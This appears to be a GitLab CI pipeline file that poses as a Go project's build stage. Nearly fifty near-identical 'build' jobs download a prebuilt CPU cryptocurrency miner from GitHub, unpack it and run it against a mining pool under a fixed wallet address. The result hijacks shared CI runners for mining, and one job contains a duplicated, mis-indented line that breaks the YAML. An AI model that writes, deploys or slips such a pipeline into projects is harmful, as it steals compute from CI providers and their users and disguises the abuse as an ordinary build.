image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
    
build_b:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
    
build_c:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
      - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_d:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_e:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_f:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_g:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_h:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_i:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_j:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_k:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_l:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_m:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_n:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_o:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_p:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_q:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_r:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_s:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_t:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_u:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_v:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_w:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_x:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_y:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_z:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ab:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ac:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ad:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ae:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_af:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ag:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ah:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ai:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_aj:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ak:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_al:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_am:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_an:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ao:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_av:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_aw:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ax:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_ay:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_az:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_aaa:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_aab:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_aac:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_aad:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
build_aae:
  stage: build
  script:
    - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - tar xf hellminer_cpu_linux.tar.gz
    - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RQYaRNJ8Nj2N8LpQCPqhTUJGSaiTSePnLw. -p x --cpu 1
  
